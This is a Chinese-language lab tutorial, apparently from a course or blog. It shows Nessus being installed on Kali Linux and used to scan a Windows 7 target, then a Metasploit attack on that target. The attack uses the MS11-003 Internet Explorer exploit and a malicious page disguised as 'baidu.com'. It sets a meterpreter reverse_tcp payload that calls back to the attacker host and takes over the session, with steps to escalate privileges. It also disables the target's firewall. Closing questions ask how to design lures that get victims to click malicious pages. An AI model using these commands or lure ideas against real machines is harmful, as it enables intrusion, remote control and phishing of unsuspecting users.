1. 程式人生 > 其它 >Metasploit攻擊win7例項

Metasploit攻擊win7例項

初步瞭解實驗環境及Nessus安裝(實驗步驟一操作已全部完成,實驗環境內的操作從實驗步驟二開始)

1.檢視win7漏洞主機的登入使用者及網路配置資訊,從下圖2可以看出漏洞主機IP為10.1.1.129。使用命令如下:

ipconfig檢視網路配置資訊

2.為了更好的演示攻擊win7系統例項需要關閉win7系統的防火牆,win+R輸入cmd,執行“netsh firewall set opmode mode=disable”命令

3.檢視攻擊者主機登陸使用者及網路配置資訊,從下圖3可以看出攻擊主機登陸使用者為root ,IP為10.1.1.128

whoami檢視當前登陸使用者

ifconfig檢視網路配置資訊

4.在Nessus官網下載頁面選擇適合Kali linux的安裝程式。經實驗證明多個版本的都可以在kali linux上安裝成功,這裡選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程式。下載之後,拷貝到Kali linux主機上,執行下列命令進行安裝:

dpkg -i Nessus-8.9.1-debian6_amd64.deb 安裝Debian安裝包

5.在官網(http://www.tenable.com/products/nessus-essentials)進行註冊獲取免費版啟用驗證碼,填寫如下表單

6.啟動Nessus服務

/etc/init.d/nessusd start

7.在瀏覽器中輸入https://127.0.0.1:8834/,會提示證書不可信,可以按照提示新增對https://127.0.0.1:8834/的信任。設定Nessus的管理賬號資訊,並輸入之前獲得的驗證碼啟用Nessus.

8.啟用成功後,Nessus會從官網下載相關的檢測元件,這個過程耗時長短由主機網路環境決定。下載完成後會提示初始化Nessus環境,等初始化完成,Nessus就可以正常使用了。

實驗步驟二

利用Nessus掃描目標主機

執行命令 /etc/init.d/nessusd start 啟動Nessus服務

訪問Nessus控制端https://127.0.0.1:8834/。輸入安裝時設定的賬號資訊(密碼在桌面nessus資料夾內)。

新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。

配置掃描資訊,主要設定掃描名稱、描述和掃描目標三個資訊即可,其他配置選擇預設,配置完成點選Save。選擇對整個10.1.1.0/24網段進行掃描,如下圖所示。

圖12 配置Nessus掃描

掃描結束後,Nessus會很直觀的顯示出目標網段的安全情況。下圖顯示了整個網段的安全資訊。Nessus將安全問題歸類為Info/Low/Medium/High/Critical五個等級,其中Critical等級的問題是最危險的,Info級別的問題通常是無關痛癢的資訊顯示問題。

圖13 Nessus掃描網段結果

重點關注10.1.1.129主機,即win7靶機,Nessus掃描出該主機存在四個最高危漏洞、2個高危漏洞及其它漏洞問題。

圖14 10.1.1.129主機漏洞概況

選中高危漏洞,Nessus給出了該漏洞的介紹、風險資訊、解決方案等詳細資訊。Risk information對於攻擊者來說非常有用,可以根據Risk information去Google搜尋是否存在已知的漏洞利用Exp。

實驗步驟三

利用MS11_003 IE漏洞攻擊win7主機

步驟二中掃描得到win7主機系統存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點選我們精心構造的含有攻擊程式碼的網頁來實現系統入侵。

1.在kali中執行“msfconsole”,啟動metasploit

2.執行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP

3.執行命令:show options,檢視配置選項

4.設定生成的惡意網頁的URI為baidu.com

執行命令:set URIPATH baidu.com

5.為防止伺服器埠衝突,設定伺服器埠為8060,避開常用埠8080

執行命令:set SRVPORT 8060

6.設定攻擊負載

執行命令:set PAYLOAD windows/meterpreter/reverse_tcp

7.檢視配置選項

執行命令: show options

8.設定LHOST以繫結本地IP

set LHOST 10.1.1.128

9.為避免衝突設定LPORT

執行命令:set LPORT 8866

10.執行命令“exploit”開始進行攻擊,生成惡意網頁和做好其他準備,只等受害者訪問我們構造的惡意網頁

11.在 Win7靶機開啟IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點選網頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示資訊表明攻擊成功。

12.驗證攻擊是否成功。列出當前成功建立的回話,任意進入一個回話,檢視攻擊者的身份。可以嘗試使用getsystem進行進一步的提權,如果提權失敗則可以採取上傳提權exe程式進行提權的方案獲得最高許可權。

sessions列出所有會話

sessions -i 1進入1號會話

getuid檢視當前使用者

分析與思考

1)嘗試使用Nessus對Android裝置和Cisco路由器進行掃描,並分析掃描結果?

2)查閱微軟漏洞更新資訊,有哪些重大的漏洞能攻破未打任何補丁的win7系統?

3)思考如何設計誘騙策略來提高目標使用者點選我們構造的惡意網頁的機率?